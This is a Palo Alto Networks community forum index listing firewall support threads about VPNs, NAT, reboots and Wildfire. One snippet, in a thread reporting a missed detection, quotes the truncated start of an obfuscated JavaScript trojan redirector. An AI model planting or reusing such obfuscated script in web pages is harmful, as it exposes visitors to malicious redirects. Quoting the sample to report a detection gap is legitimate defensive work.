This website uses Cookies. By clicking Accept, you agree to the storing of cookies on your device to enhance your community and translation experience. Read our Privacy Policy.
Click Preferences to customize your cookie settings.
Accept
Reject
Preferences
Buy or Renew
Buy or Renew
General Topics
Post a discussion here if you have general questions regarding configuration and troubleshooting for Palo Alto Networks products. Use this forum to collaborate with like-minded security professionals to improve your security posture.
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Show  only  | Search instead for 
Did you mean: 
General Topics
Post a discussion here if you have general questions regarding configuration and troubleshooting for Palo Alto Networks products. Use this forum to collaborate with like-minded security professionals to improve your security posture.
About General Topics
Post a discussion here if you have general questions regarding configuration and troubleshooting for Palo Alto Networks products. Use this forum to collaborate with like-minded security professionals to improve your security posture.

Discussions

Start a conversation

Discover LIVEcommunity Through Our New Animated Explainer Video!

We’re thrilled to unveil a brand-new animated video that highlights everything LIVEcommunity has to offer! This short and engaging video gives you a quick tour of the many resources available in our vibrant community — from interactive discussions and customer journey guides to the Cyber Elite program and Member Spotlight features. Whether ...

kiwi_0-1745308399217.png
kiwi by Community Team Member
  • 4141 Views
  • 0 replies
  • 0 Likes

Resolved! SSL-VPN and Site to Site VPN on same Public IP

I am in the process of configuring a site to site vpn but when I try and select my public ipaddress (outside interface) for the local ip in the ike gateway setup the ip address is not avalible as an option. I assume this is because its already configured for my global protect gateway and portal? Is this possibly the issue? Currently the portal a...

How do I configure an external interface for a direct fiber (metro ethernet) connection?

We are in the process of switching from a T1 provider to a fiber connection through another ISP. The T1 provider has us on a /29 network where they provide a router which occupies the first usable IP of the range. Our new ISP has the outside interface on our PA-500 connecting directly to a switch. We were given two ranges of IP addresses: a ...

kwarner23 by Not applicable
  • 8365 Views
  • 7 replies
  • 0 Likes

PA-500 Auto Reboot

Good Morning EveryoneCan anyone shed some light on why my PA-500 will auto-reboot after the following incident logged on the system log "description contains 'infra-group: restarts exhausted, rebooting system"We running the latest 4.1 OSHow can we prevent this from happening again?RegardsKobus

u7285 by Not applicable
  • 3477 Views
  • 2 replies
  • 0 Likes

Resolved! port forwarding external to internal

Hi,i just want to create a "easy" port forwarding rule from external (public ip), port 52516 to a internal server port 52516, but i can´t get it done on a PA-2050. it´s a web-service running on that internal server....i´ve created a service/application for that tcp-port, i´v created a PBF-Rule and a port-based NAT rule, but it´s not working at a...

Global Protect Configuration Help - Windows 7 issues

So I have a few questions. We have netconnect working just fine for our mac users (PanOS 4.0.4) but we get an error about being unable to build nat interface on all windows 7 clients. If I enable the global protect feature, do I need to have it answer on a different IP address than the netconnect SSL vpn?ThanksPS. is there a better version of...

thesl by Not applicable
  • 6493 Views
  • 1 replies
  • 0 Likes

Resolved! PA dont catches Trojan JS.Redirector

Hi folks,the Palo Alto Networks threat prevention is not able to recognize the following code as malicious:<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try /{new document.getElementById("qwe").prototype}catch(qqq){st=String;zz='al';zz='v'+zz;ss=""; /if(1){f='f'+'r'+'o'+'m'+'Ch'+'ar';f=f+'C'+'od'+'e';}e=this[f.substr(11)...

mhuels by L3 Networker
  • 3397 Views
  • 3 replies
  • 0 Likes

Potential firewall performance issues when using FQDNs?

I'm new to Palo Alto firewalls. I'm setting up a PA-500 active/passive HA cluster, replacing an HA cluster of Sidewinder v7 (McAfee Firewall Enterprise) firewalls. I know from many years of experience with that type of firewall and from talking to tech support that using network objects of the FQDN type (requiring DNS lookups) is a bad thing f...

Resolved! Need More-Granular-Definition/Understanding of the period value "Last Calendar Month"

Hello. I'm trying to make - certain that I'm properly - grasping the concept of "Last Calendar Month", when I'm performing my historical searches. Say it's March 28th, 2012 and I'm conducting a search based upon the period value "Last Calendar Month"; am I correct to understand, that my results shall be reflective of everything that occurred f...

IMgrtrU by Not applicable
  • 3461 Views
  • 2 replies
  • 0 Likes

VPN WITH PIX AND FQDN

hello,I try to migrate a vpn between pix and palo-altowhen I try to generate traffic I can see the following error :IKE phase-1 negotiation is failed. When pre-shared key is used, peer-ID must be type IP address. Received type FQDNI understand that my pix need to have a fqdn configured on PALO ALTO in the field -> IKE-GATEWAYPeer identificati...

alle by L3 Networker
  • 4462 Views
  • 5 replies
  • 0 Likes

Resolved! policy based forwarding to proxy

We use ntlm (CP) to authenticate our users against the PA.We want any http traffic forwarded to a proxy. The proxy would have http access to the internet through the PA. I was thinking of using a policy based forwarding rule to forward service-http to the proxy. Similar to how e.g. a Cisco router can intercept http traffic and forward it to a pr...

dieter_b by L4 Transporter
  • 8170 Views
  • 4 replies
  • 0 Likes

Skype only zone configuration...

Hi!I am trying to setup a zone with Skype only configuration with the following "Application Group":skypeskype-probeweb-browsingThe end result is that Skype voice works fine; however, Add Contacts feature in Skype doesn't work.I am testing with the 5.8.0.158 version of Skype under Windows 7.Thx!- john

gebis_it by Not applicable
  • 3834 Views
  • 4 replies
  • 0 Likes

File Uploads to Wildfire

I have seen another thread on this issue in the KnowledgePoint database; however, there was no resolution or answer to the question. I have setup the Wildfire configuration on all of my PA500's per the documentation provided. When matching the file blocking rule I can see it in the Monitor interface for the file with a "forward" action, but it...

Steven by L1 Bithead
  • 4565 Views
  • 4 replies
  • 0 Likes

Anybody successfully used 4.1.3 for direct AD group enumeration?

Just logged a support ticket recently regarding the direct group enumeration in PA 4.1.3 on a PA-5K .It seemed that the firewall was only returning the first 1000 AD objects.. which is a default limit defined by the "MaxPageSize" variable in Active Directory.LDAP clients making queries that exceed 1000 results will usually utilise the paging con...

ucteam by Not applicable
  • 2317 Views
  • 1 replies
  • 0 Likes

Resolved! show config running xpath syntax

Hello,I try to figure out the correct sytax for the xpath option of the show config running CLI-command (running PAN-OS 3.0.6).? says:+ xpath xpath of the node to retrievebut every way I tried to describe the node I want gives me a "Invalid syntax".

PAkeeper by L0 Member
  • 11728 Views
  • 5 replies
  • 0 Likes
  • 24340 Posts
  • 124 Subscriptions
Top Liked Authors
View All
Labels
LEGAL NOTICES
RESOURCES
Khoros awards 2022
Copyright 2007 - 2026 - Palo Alto Networks